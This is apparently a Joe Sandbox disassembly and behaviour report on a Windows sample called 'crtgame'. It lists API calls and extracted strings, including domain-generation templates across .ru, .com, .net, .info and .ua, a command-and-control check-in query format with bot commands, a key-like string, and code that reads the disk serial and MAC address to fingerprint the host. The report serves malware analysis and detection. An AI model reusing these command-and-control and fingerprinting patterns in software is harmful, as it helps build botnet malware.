15713->15714 15716 2bdd522 15713->15716 15715 2bd2974 __freefls@4 59 API calls 15714->15715 15714->15716 15715->15716 15716->15712 15719 2bdd2d6 MultiByteToWideChar 15717->15719 15720 2bdd335 15719->15720 15724 2bdd33c 15719->15724 15721 2bd3f4b __cftoe2_l 6 API calls 15720->15721 15722 2bd4e69 15721->15722 15722->15688 15723 2bdd39b MultiByteToWideChar 15725 2bdd402 15723->15725 15726 2bdd3b4 15723->15726 15727 2bd29ac _malloc 59 API calls 15724->15727 15730 2bdd364 15724->15730 15729 2bdd507 __freea 59 API calls 15725->15729 15742 2bdf0e8 15726->15742 15727->15730 15729->15720 15730->15720 15730->15723 15731 2bdd3c8 15731->15725 15732 2bdd3de 15731->15732 15734 2bdd40a 15731->15734 15732->15725 15733 2bdf0e8 __crtLCMapStringA_stat LCMapStringW 15732->15733 15733->15725 15737 2bd29ac _malloc 59 API calls 15734->15737 15740 2bdd432 15734->15740 15735 2bdf0e8 __crtLCMapStringA_stat LCMapStringW 15736 2bdd475 15735->15736 15738 2bdd49d 15736->15738 15741 2bdd48f WideCharToMultiByte 15736->15741 15737->15740 15739 2bdd507 __freea 59 API calls 15738->15739 15739->15725 15740->15725 15740->15735 15741->15738 15743 2bdf0f8 15742->15743 15744 2bdf113 __crtLCMapStringA_stat 15742->15744 15743->15731 15745 2bdf12a LCMapStringW 15744->15745 15745->15731 15746->15679 15748 2bd66d5 15747->15748 15749 2bd66c7 15747->15749 15750 2bd585b __cftoe2_l 59 API calls 15748->15750 15749->15748 15754 2bd66eb 15749->15754 15751 2bd66dc 15750->15751 15752 2bd48f5 __cftoe2_l 9 API calls 15751->15752 15753 2bd66e6 15752->15753 15753->15457 15754->15753 15755 2bd585b __cftoe2_l 59 API calls 15754->15755 15755->15751 15757 2bdcce2 RtlEncodePointer 15756->15757 15757->15757 15758 2bdccfc 15757->15758 15758->15464 15760 2bd8bbf 15759->15760 15761 2bd8bc3 TlsFree 15759->15761 15760->15469 15761->15469 15763 2bd54fb ___lock_fhandle 15762->15763 15764 2bd5514 15763->15764 15765 2bd5603 ___lock_fhandle 15763->15765 15766 2bd2974 __freefls@4 59 API calls 15763->15766 15767 2bd5523 15764->15767 15769 2bd2974 __freefls@4 59 API calls 15764->15769 15765->15519 15766->15764 15768 2bd5532 15767->15768 15770 2bd2974 __freefls@4 59 API calls 15767->15770 15771 2bd5541 15768->15771 15772 2bd2974 __freefls@4 59 API calls 15768->15772 15769->15767 15770->15768 15773 2bd5550 15771->15773 15774 2bd2974 __freefls@4 59 API calls 15771->15774 15772->15771 15775 2bd555f 15773->15775 15777 2bd2974 __freefls@4 59 API calls 15773->15777 15774->15773 15776 2bd556e 15775->15776 15778 2bd2974 __freefls@4 59 API calls 15775->15778 15779 2bd5580 15776->15779 15780 2bd2974 __freefls@4 59 API calls 15776->15780 15777->15775 15778->15776 15781 2bd82ef __lock 59 API calls 15779->15781 15780->15779 15784 2bd5588 15781->15784 15786 2bd2974 __freefls@4 59 API calls 15784->15786 15787 2bd55ab 15784->15787 15785 2bd82ef __lock 59 API calls 15792 2bd55bf ___removelocaleref 15785->15792 15786->15787 15794 2bd560f 15787->15794 15788 2bd55f0 15797 2bd561b 15788->15797 15791 2bd2974 __freefls@4 59 API calls 15791->15765 15792->15788 15793 2bd49c5 ___freetlocinfo 59 API calls 15792->15793 15793->15788 15800 2bd8459 RtlLeaveCriticalSection 15794->15800 15796 2bd55b8 15796->15785 15801 2bd8459 RtlLeaveCriticalSection 15797->15801 15799 2bd55fd 15799->15791 15800->15796 15801->15799 15802 2bfe90c WriteFile 15803 2c55bdd 15802->15803 15804 2bc5f14 RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 15883 2bcf1e7 15804->15883 15806 2bc5f94 GetTickCount 15892 2bc5c39 15806->15892 16053 2bcf29c CreateFileA 15883->16053 15888 2bcf23f CreateFileA 15889 2bcf28b 15888->15889 15890 2bcf263 GetFileTime CloseHandle 15888->15890 15889->15806 15890->15889 15891 2bcf27d 15890->15891 15891->15889 15893 2bd29ac _malloc 59 API calls 15892->15893 15894 2bc5c4d _memset 15893->15894 15895 2bc5c60 SHGetSpecialFolderPathW lstrcpyW lstrcatW CreateFileW 15894->15895 15896 2bc5cbe 15895->15896 15897 2bc5c9f ReadFile CloseHandle 15895->15897 16068 2bd34fb GetSystemTimeAsFileTime 15896->16068 15898 2bc5d04 15897->15898 16070 2bc55a8 15898->16070 15900 2bc5cca CreateFileW 15900->15898 15902 2bc5ceb WriteFile CloseHandle 15900->15902 15902->15898 16054 2bcf2cd 16053->16054 16055 2bcf221 16053->16055 16056 2bcf2e5 DeviceIoControl 16054->16056 16057 2bcf38e CloseHandle 16054->16057 16058 2bcf35a GetLastError 16054->16058 16059 2bd354c _Allocate 60 API calls 16054->16059 16060 2bcf3a0 LoadLibraryA 16055->16060 16056->16054 16057->16055 16058->16054 16058->16057 16059->16054 16061 2bcf3c9 GetProcAddress 16060->16061 16062 2bcf229 GetWindowsDirectoryA 16060->16062 16063 2bcf47c FreeLibrary 16061->16063 16064 2bcf3dd 16061->16064 16062->15888 16062->15889 16063->16062 16065 2bcf3ef GetAdaptersInfo 16064->16065 16066 2bcf477 16064->16066 16067 2bd354c _Allocate 60 API calls 16064->16067 16065->16064 16066->16063 16067->16064 16069 2bd3529 __aulldiv 16068->16069 16069->15900 16071 2bd29ac _malloc 59 API calls 16070->16071 16072 2bc55c4 16071->16072 17406 2c14a2a 17407 2c43c08 SHGetSpecialFolderPathA 17406->17407 17408 2c4800e 17407->17408
                                                                          APIs
                                                                          • RtlInitializeCriticalSection.NTDLL(02BF73D8), ref: 02BC5F43
                                                                          • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 02BC5F5A
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 02BC5F63
                                                                          • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 02BC5F72
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 02BC5F75
                                                                            • Part of subcall function 02BCF1E7: GetWindowsDirectoryA.KERNEL32(?,00000104,?,00000000,00000000), ref: 02BCF235
                                                                            • Part of subcall function 02BCF1E7: CreateFileA.KERNELBASE(?,00100000,00000007,00000000,00000003,02000000,00000000), ref: 02BCF256
                                                                            • Part of subcall function 02BCF1E7: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 02BCF26A
                                                                            • Part of subcall function 02BCF1E7: CloseHandle.KERNEL32(00000000), ref: 02BCF273
                                                                          • GetTickCount.KERNEL32 ref: 02BC5FB6
                                                                          • GetVersionExA.KERNEL32(02BF7030), ref: 02BC5FE3
                                                                          • _memset.LIBCMT ref: 02BC6000
                                                                          • _malloc.LIBCMT ref: 02BC600D
                                                                          • _malloc.LIBCMT ref: 02BC601D
                                                                          • _malloc.LIBCMT ref: 02BC602B
                                                                          • _malloc.LIBCMT ref: 02BC6036
                                                                          • _malloc.LIBCMT ref: 02BC6041
                                                                          • _malloc.LIBCMT ref: 02BC604C
                                                                          • _malloc.LIBCMT ref: 02BC6057
                                                                          • _malloc.LIBCMT ref: 02BC6066
                                                                          • GetProcessHeap.KERNEL32(00000000,00000004), ref: 02BC607D
                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 02BC6086
                                                                          • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02BC6095
                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 02BC6098
                                                                          • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02BC60A3
                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 02BC60A6
                                                                          • _memset.LIBCMT ref: 02BC60B9
                                                                          • _memset.LIBCMT ref: 02BC60C5
                                                                          • _memset.LIBCMT ref: 02BC60D2
                                                                          • RtlEnterCriticalSection.NTDLL(02BF73D8), ref: 02BC60E0
                                                                          • RtlLeaveCriticalSection.NTDLL(02BF73D8), ref: 02BC60ED
                                                                          • _malloc.LIBCMT ref: 02BC6111
                                                                            • Part of subcall function 02BD29AC: __FF_MSGBANNER.LIBCMT ref: 02BD29C3
                                                                            • Part of subcall function 02BD29AC: __NMSG_WRITE.LIBCMT ref: 02BD29CA
                                                                            • Part of subcall function 02BD29AC: RtlAllocateHeap.NTDLL(00830000,00000000,00000001), ref: 02BD29EF
                                                                          • _malloc.LIBCMT ref: 02BC611F
                                                                          • _malloc.LIBCMT ref: 02BC6126
                                                                          • _malloc.LIBCMT ref: 02BC614A
                                                                          • QueryPerformanceCounter.KERNEL32(00000200), ref: 02BC615A
                                                                          • Sleep.KERNELBASE ref: 02BC6168
                                                                          • _malloc.LIBCMT ref: 02BC6174
                                                                          • _malloc.LIBCMT ref: 02BC6181
                                                                          • _memset.LIBCMT ref: 02BC6196
                                                                          • _memset.LIBCMT ref: 02BC61A6
                                                                          • Sleep.KERNELBASE(00001388), ref: 02BC61C2
                                                                          • RtlEnterCriticalSection.NTDLL(02BF73D8), ref: 02BC61CD
                                                                          • RtlLeaveCriticalSection.NTDLL(02BF73D8), ref: 02BC61DE
                                                                          • _memset.LIBCMT ref: 02BC6233
                                                                          • _memset.LIBCMT ref: 02BC6242
                                                                          • GetTickCount.KERNEL32 ref: 02BC62E5
                                                                          • _memset.LIBCMT ref: 02BC630F
                                                                          • wsprintfA.USER32 ref: 02BC6C3B
                                                                          • _memset.LIBCMT ref: 02BC6C5C
                                                                          • _memset.LIBCMT ref: 02BC6C6C
                                                                          • _memset.LIBCMT ref: 02BC6C9B
                                                                          • InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 02BC6D3D
                                                                          • InternetSetOptionA.WININET(00000000,00000002,?), ref: 02BC6D65
                                                                          • InternetSetOptionA.WININET(00000000,00000005,00001388,00000004), ref: 02BC6D7D
                                                                          • InternetSetOptionA.WININET(00000000,00000006,00001388,00000004), ref: 02BC6D95
                                                                          • _memset.LIBCMT ref: 02BC6DA5
                                                                          • InternetOpenUrlA.WININET(00000000,?,?,000000FF,04000200,00000000), ref: 02BC6DBE
                                                                          • InternetReadFile.WININET(00000000,?,00001000,?), ref: 02BC6DDD
                                                                          • InternetCloseHandle.WININET(00000000), ref: 02BC6DF7
                                                                          • InternetCloseHandle.WININET(00000000), ref: 02BC6E02
                                                                          • _memset.LIBCMT ref: 02BC6E4D
                                                                          • RtlEnterCriticalSection.NTDLL(02BF73D8), ref: 02BC6E72
                                                                          • RtlLeaveCriticalSection.NTDLL(02BF73D8), ref: 02BC6E83
                                                                          • _malloc.LIBCMT ref: 02BC6F0A
                                                                          • RtlEnterCriticalSection.NTDLL(02BF73D8), ref: 02BC6F1C
                                                                          • RtlLeaveCriticalSection.NTDLL(02BF73D8), ref: 02BC6F28
                                                                          • _memset.LIBCMT ref: 02BC6F42
                                                                          • _memset.LIBCMT ref: 02BC6F51
                                                                          • _memset.LIBCMT ref: 02BC6F61
                                                                          • _memset.LIBCMT ref: 02BC6F70
                                                                          • _memset.LIBCMT ref: 02BC6F82
                                                                          • _malloc.LIBCMT ref: 02BC6FFC
                                                                          • _memset.LIBCMT ref: 02BC700D
                                                                          • _strtok.LIBCMT ref: 02BC702D
                                                                          • _swscanf.LIBCMT ref: 02BC7044
                                                                          • _strtok.LIBCMT ref: 02BC705B
                                                                          • Sleep.KERNEL32(000007D0), ref: 02BC7162
                                                                          • _memset.LIBCMT ref: 02BC71D6
                                                                          • RtlEnterCriticalSection.NTDLL(02BF73D8), ref: 02BC71E3
                                                                          • RtlLeaveCriticalSection.NTDLL(02BF73D8), ref: 02BC71F5
                                                                          • _sprintf.LIBCMT ref: 02BC728A
                                                                          • RtlEnterCriticalSection.NTDLL(00000020), ref: 02BC734E
                                                                          • RtlLeaveCriticalSection.NTDLL(00000020), ref: 02BC7382
                                                                            • Part of subcall function 02BC5D1D: _malloc.LIBCMT ref: 02BC5D2B
                                                                          • _malloc.LIBCMT ref: 02BC7583
                                                                          • _memset.LIBCMT ref: 02BC758F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: _memset$_malloc$CriticalSection$Internet$Heap$EnterLeave$Handle$Allocate$CloseFileOptionProcessSleep$AddressCountModuleOpenProcTick_strtok$CounterCreateDirectoryInitializePerformanceQueryReadTimeVersionWindows_sprintf_swscanfwsprintf
                                                                          • String ID: $%d;$/click/?counter=$<htm$Host: %s$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$a%c%c%c%c%c%c.ru$auth_ip$auth_swith$b%c%c%c%c%c%c.com$block$c%c%c%c%c%c%c.net$client_id=%.8x&connected=%d&server_port=%d&debug=%d&os=%d.%d.%04d&dgt=%d&dti=%d$connect$d%c%c%c%c%c%c.info$disconnect$e%c%c%c%c%c%c.ua$f%c%c%c%c%c%c.ru$g%c%c%c%c%c%c.com$h%c%c%c%c%c%c.net$http://$i%c%c%c%c%c%c.info$i4hiea56#7b&dfw3$idle$j%c%c%c%c%c%c.info$k%c%c%c%c%c%c.ua$l%c%c%c%c%c%c.ru$m%c%c%c%c%c%c.com$n%c%c%c%c%c%c.net$ntdll.dll$o%c%c%c%c%c%c.info$p%c%c%c%c%c%c.ua$q%c%c%c%c%c%c.ru$r%c%c%c%c%c%c.com$s%c%c%c%c%c%c.net$sprintf$strcat$t%c%c%c%c%c%c.info$u%c%c%c%c%c%c.ua$updips$updurls$urls$v%c%c%c%c%c%c.ru$w%c%c%c%c%c%c.com$x%c%c%c%c%c%c.net$y%c%c%c%c%c%c.info$z%c%c%c%c%c%c.ua
                                                                          • API String ID: 2018021302-1381308451
                                                                          • Opcode ID: 0f07d023c36c2de5cf5a4dd3df5db7851bf45487ae999b5f11cb963dafc8bf85
                                                                          • Instruction ID: 9e3c9d2e6329a35d8987181992355605eccad3719d7ef9f18c519d159397008c
                                                                          • Opcode Fuzzy Hash: 0f07d023c36c2de5cf5a4dd3df5db7851bf45487ae999b5f11cb963dafc8bf85
                                                                          • Instruction Fuzzy Hash: B7D205B36187905ED3119A2C9C81F7FFBECAF89304F5809ADF5D5C6142C668C606CBA2

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 477 2bcf3a0-2bcf3c3 LoadLibraryA 478 2bcf3c9-2bcf3d7 GetProcAddress 477->478 479 2bcf483-2bcf48a 477->479 480 2bcf47c-2bcf47d FreeLibrary 478->480 481 2bcf3dd-2bcf3ed 478->481 480->479 482 2bcf3ef-2bcf3fb GetAdaptersInfo 481->482 483 2bcf3fd 482->483 484 2bcf433-2bcf43b 482->484 487 2bcf3ff-2bcf406 483->487 485 2bcf43d-2bcf443 call 2bd31a8 484->485 486 2bcf444-2bcf449 484->486 485->486 489 2bcf44b-2bcf44e 486->489 490 2bcf477-2bcf47b 486->490 491 2bcf408-2bcf40c 487->491 492 2bcf410-2bcf418 487->492 489->490 496 2bcf450-2bcf455 489->496 490->480 491->487 493 2bcf40e 491->493 494 2bcf41b-2bcf420 492->494 493->484 494->494 497 2bcf422-2bcf42f call 2bcf082 494->497 498 2bcf457-2bcf45f 496->498 499 2bcf462-2bcf46d call 2bd354c 496->499 497->484 498->499 499->490 504 2bcf46f-2bcf472 499->504 504->482
                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(iphlpapi.dll,?), ref: 02BCF3B6
                                                                          • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 02BCF3CF
                                                                          • GetAdaptersInfo.IPHLPAPI(?,00000000,?,00000000), ref: 02BCF3F4
                                                                          • FreeLibrary.KERNEL32(00000000), ref: 02BCF47D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                          • String ID: GetAdaptersInfo$iphlpapi.dll
                                                                          • API String ID: 514930453-3114217049
                                                                          • Opcode ID: 0e4e6741fef77620505972d7ab3386d3ac05bdf21af58ff0df90fc26a1e3d3bc
                                                                          • Instruction ID: 20a72a4a124be68f6d5137e9c8d1e610f76d6e0647d201e947593a9965ad16eb
                                                                          • Opcode Fuzzy Hash: 0e4e6741fef77620505972d7ab3386d3ac05bdf21af58ff0df90fc26a1e3d3bc
                                                                          • Instruction Fuzzy Hash: DF21A571E04209ABDF14DBA8D840AFEBBFAEF44314F2840EEE545E7601D7308945CBA0

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 505 2bc2b95-2bc2baf 506 2bc2bc7-2bc2bcb 505->506 507 2bc2bb1-2bc2bb9 call 2bd0510 505->507 508 2bc2bcd-2bc2bd0 506->508 509 2bc2bdf 506->509 516 2bc2bbf-2bc2bc2 507->516 508->509 511 2bc2bd2-2bc2bdd call 2bd0510 508->511 512 2bc2be2-2bc2c11 WSASetLastError WSARecv call 2bc9e92 509->512 511->516 518 2bc2c16-2bc2c1d 512->518 519 2bc2d30 516->519 521 2bc2c2c-2bc2c32 518->521 522 2bc2c1f-2bc2c2a call 2bd0510 518->522 520 2bc2d32-2bc2d38 519->520 524 2bc2c34-2bc2c39 call 2bd0510 521->524 525 2bc2c46-2bc2c48 521->525 532 2bc2c3f-2bc2c42 522->532 524->532 526 2bc2c4f-2bc2c60 call 2bd0510 525->526 527 2bc2c4a-2bc2c4d 525->527 526->520 530 2bc2c66-2bc2c69 526->530 527->530 535 2bc2c6b-2bc2c6d 530->535 536 2bc2c73-2bc2c76 530->536 532->525 535->536 537 2bc2d22-2bc2d2d call 2bc1996 535->537 536->519 538 2bc2c7c-2bc2c9a call 2bd0510 call 2bc166f 536->538 537->519 545 2bc2cbc-2bc2cfa WSASetLastError select call 2bc9e92 538->545 546 2bc2c9c-2bc2cba call 2bd0510 call 2bc166f 538->546 552 2bc2cfc-2bc2d06 call 2bd0510 545->552 553 2bc2d08 545->553 546->519 546->545 560 2bc2d19-2bc2d1d 552->560 556 2bc2d0a-2bc2d12 call 2bd0510 553->556 557 2bc2d15-2bc2d17 553->557 556->557 557->519 557->560 560->512
                                                                          APIs
                                                                          • WSASetLastError.WS2_32(00000000,00000000,505C3A43,00000000), ref: 02BC2BE4
                                                                          • WSARecv.WS2_32(?,?,00000002,?,?,00000000,00000000), ref: 02BC2C07
                                                                            • Part of subcall function 02BC9E92: WSAGetLastError.WS2_32(?,00000080,00000017,02BC3114), ref: 02BC9EA0
                                                                          • WSASetLastError.WS2_32(?,?,?,?,00000000), ref: 02BC2CD3
                                                                          • select.WS2_32(?,?,00000000,00000000,00000000), ref: 02BC2CE7
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorLast$Recvselect
                                                                          • String ID: 3'
                                                                          • API String ID: 886190287-280543908
                                                                          • Opcode ID: a45d365888b081351bba4ec532f0b815e81737998dab146e544179c6bf134561
                                                                          • Instruction ID: adb0a06a76ec7daa368a8e4ddb2799ddddab658afbb474da3f5db2b42bb8fcbb
                                                                          • Opcode Fuzzy Hash: a45d365888b081351bba4ec532f0b815e81737998dab146e544179c6bf134561
                                                                          • Instruction Fuzzy Hash: 3C416CB19143059FDB10AF64C5447ABBBE9EF94364F204D9EEC9987281EBB0D540CB92

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 562 2bcf29c-2bcf2c7 CreateFileA 563 2bcf2cd-2bcf2e2 562->563 564 2bcf398-2bcf39f 562->564 565 2bcf2e5-2bcf307 DeviceIoControl 563->565 566 2bcf309-2bcf311 565->566 567 2bcf340-2bcf348 565->567 570 2bcf31a-2bcf31f 566->570 571 2bcf313-2bcf318 566->571 568 2bcf34a-2bcf350 call 2bd31a8 567->568 569 2bcf351-2bcf353 567->569 568->569 573 2bcf38e-2bcf397 CloseHandle 569->573 574 2bcf355-2bcf358 569->574 570->567 575 2bcf321-2bcf329 570->575 571->567 573->564 577 2bcf35a-2bcf363 GetLastError 574->577 578 2bcf374-2bcf381 call 2bd354c 574->578 579 2bcf32c-2bcf331 575->579 577->573 580 2bcf365-2bcf368 577->580 578->573 587 2bcf383-2bcf389 578->587 579->579 582 2bcf333-2bcf33f call 2bcf082 579->582 580->578 583 2bcf36a-2bcf371 580->583 582->567 583->578 587->565
                                                                          APIs
                                                                          • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000,00000000,?), ref: 02BCF2BB
                                                                          • DeviceIoControl.KERNELBASE(00000000,002D1400,?,0000000C,?,00000400,00000000,00000000), ref: 02BCF2F9
                                                                          • GetLastError.KERNEL32 ref: 02BCF35A
                                                                          • CloseHandle.KERNELBASE(?), ref: 02BCF391
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CloseControlCreateDeviceErrorFileHandleLast
                                                                          • String ID: \\.\PhysicalDrive0
                                                                          • API String ID: 4026078076-1180397377
                                                                          • Opcode ID: f2a1b2489862e0558128b339874540c0272caafa4c23c6c4afea4c04571c9cca
                                                                          • Instruction ID: ceced9f9cbcf60534da79e33ea68e57f77b391b03a9553cdf8e81cd823f6e738
                                                                          • Opcode Fuzzy Hash: f2a1b2489862e0558128b339874540c0272caafa4c23c6c4afea4c04571c9cca
                                                                          • Instruction Fuzzy Hash: F4318F71E00219FBDF24DF94D884AFEBBBAEB84754F2081EEE505A7680D7745A44CB90

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • _malloc.LIBCMT ref: 02BC5C48
                                                                            • Part of subcall function 02BD29AC: __FF_MSGBANNER.LIBCMT ref: 02BD29C3
                                                                            • Part of subcall function 02BD29AC: __NMSG_WRITE.LIBCMT ref: 02BD29CA
                                                                            • Part of subcall function 02BD29AC: RtlAllocateHeap.NTDLL(00830000,00000000,00000001), ref: 02BD29EF
                                                                          • _memset.LIBCMT ref: 02BC5C5B
                                                                          • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000023,00000000,?,?,?,00000000), ref: 02BC5C68
                                                                          • lstrcpyW.KERNEL32(C:\ProgramData\rc.dat,00000000,?,?,?,00000000), ref: 02BC5C70
                                                                          • lstrcatW.KERNEL32(C:\ProgramData\rc.dat,\ts.dat,?,?,?,00000000), ref: 02BC5C7C
                                                                          • CreateFileW.KERNELBASE(C:\ProgramData\rc.dat,80000000,00000000,00000000,00000003,00000020,00000000,?,?,?,00000000), ref: 02BC5C95
                                                                          • ReadFile.KERNEL32(00000000,?,00000008,?,00000000,?,?,?,00000000), ref: 02BC5CAA
                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,00000000), ref: 02BC5CB1
                                                                          • __time64.LIBCMT ref: 02BC5CC5
                                                                          • CreateFileW.KERNELBASE(C:\ProgramData\rc.dat,40000000,00000000,00000000,00000002,00000022,00000000,?,?,?,00000000), ref: 02BC5CE2
                                                                          • WriteFile.KERNELBASE(00000000,?,00000008,?,00000000,?,?,?,00000000), ref: 02BC5CF7
                                                                          • CloseHandle.KERNELBASE(00000000,?,?,?,00000000), ref: 02BC5CFE
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: File$CloseCreateHandle$AllocateFolderHeapPathReadSpecialWrite__time64_malloc_memsetlstrcatlstrcpy
                                                                          • String ID: C:\ProgramData\rc.dat$\ts.dat
                                                                          • API String ID: 204396691-2903805982
                                                                          • Opcode ID: 717b93fb9dab002a59c0b8b52d1c47c6959390d71a8ab3e5e5bafe605bc79879
                                                                          • Instruction ID: 2551820f7fdc657016e7290b1a93fb8aed5ea777f7d169190fb5f3f20edb7e06
                                                                          • Opcode Fuzzy Hash: 717b93fb9dab002a59c0b8b52d1c47c6959390d71a8ab3e5e5bafe605bc79879
                                                                          • Instruction Fuzzy Hash: 7E210372940208BFE710AAA4AC88FAFF76CDB856A4F104495FA05A71C1DA741E499BB1

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02BC1D11
                                                                          • GetLastError.KERNEL32 ref: 02BC1D23
                                                                            • Part of subcall function 02BC1712: __EH_prolog.LIBCMT ref: 02BC1717
                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02BC1D59
                                                                          • GetLastError.KERNEL32 ref: 02BC1D6B
                                                                          • __beginthreadex.LIBCMT ref: 02BC1DB1
                                                                          • GetLastError.KERNEL32 ref: 02BC1DC6
                                                                          • CloseHandle.KERNEL32(00000000), ref: 02BC1DDD
                                                                          • CloseHandle.KERNEL32(00000000), ref: 02BC1DEC
                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BC1E14
                                                                          • CloseHandle.KERNELBASE(00000000), ref: 02BC1E1B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CloseErrorHandleLast$CreateEvent$H_prologObjectSingleWait__beginthreadex
                                                                          • String ID: thread$thread.entry_event$thread.exit_event
                                                                          • API String ID: 831262434-3017686385
                                                                          • Opcode ID: f12a34fe4794afe9a0f4ec957706413da8dbcc54c2ca978d4addfda44e8a92a7
                                                                          • Instruction ID: 6be00e7537f34e553dcb3c652c03c0dc0d93d26b3722401ffe3cb47f7acd447e
                                                                          • Opcode Fuzzy Hash: f12a34fe4794afe9a0f4ec957706413da8dbcc54c2ca978d4addfda44e8a92a7
                                                                          • Instruction Fuzzy Hash: 3F3172719043019FDB00EF24C884B6BBBA5EF84754F2049ADF8599B292DB709949CF92

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 02BC4CB6
                                                                          • RtlEnterCriticalSection.NTDLL(02BF73D8), ref: 02BC4CE2
                                                                          • RtlLeaveCriticalSection.NTDLL(02BF73D8), ref: 02BC4CEE
                                                                            • Part of subcall function 02BC4B18: __EH_prolog.LIBCMT ref: 02BC4B1D
                                                                            • Part of subcall function 02BC4B18: InterlockedExchange.KERNEL32(?,00000000), ref: 02BC4C1D
                                                                          • RtlEnterCriticalSection.NTDLL(02BF73D8), ref: 02BC4DBE
                                                                          • RtlLeaveCriticalSection.NTDLL(02BF73D8), ref: 02BC4DC4
                                                                          • RtlEnterCriticalSection.NTDLL(02BF73D8), ref: 02BC4DCB
                                                                          • RtlLeaveCriticalSection.NTDLL(02BF73D8), ref: 02BC4DD1
                                                                          • RtlEnterCriticalSection.NTDLL(02BF73D8), ref: 02BC4FD2
                                                                          • RtlLeaveCriticalSection.NTDLL(02BF73D8), ref: 02BC4FD8
                                                                          • RtlEnterCriticalSection.NTDLL(02BF73D8), ref: 02BC4FE3
                                                                          • RtlLeaveCriticalSection.NTDLL(02BF73D8), ref: 02BC4FEC
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_2bc1000_crtgame.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterLeave$H_prolog$ExchangeInterlocked
                                                                          • String ID:
                                                                          • API String ID: 2062355503-0
                                                                          • Opcode ID: a30579d271f891cc24b018dd40aff02045f6c01afeca04cc0f4c0b2cb4c3bb8e
                                                                          • Instruction ID: 4d63518c49109d4c0f632efdc9ad2eb72d9f53e12bc857f086efaa2a2c9caffd
                                                                          • Opcode Fuzzy Hash: a30579d271f891cc24b018dd40aff02045f6c01afeca04cc0f4c0b2cb4c3bb8e
                                                                          • Instruction Fuzzy Hash: 5EB12A71D0425DDEEF25DF94C850BEEBBB5AF04314F2440DAE809BA280DBB46A49CF61

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • RtlEnterCriticalSection.NTDLL(?), ref: 02BC2706
                                                                          • CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02BC272B
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02BE5553), ref: 02BC2738
                                                                            • Part of subcall function 02BC1712: __EH_prolog.LIBCMT ref: 02BC1717
                                                                          • SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 02BC2778
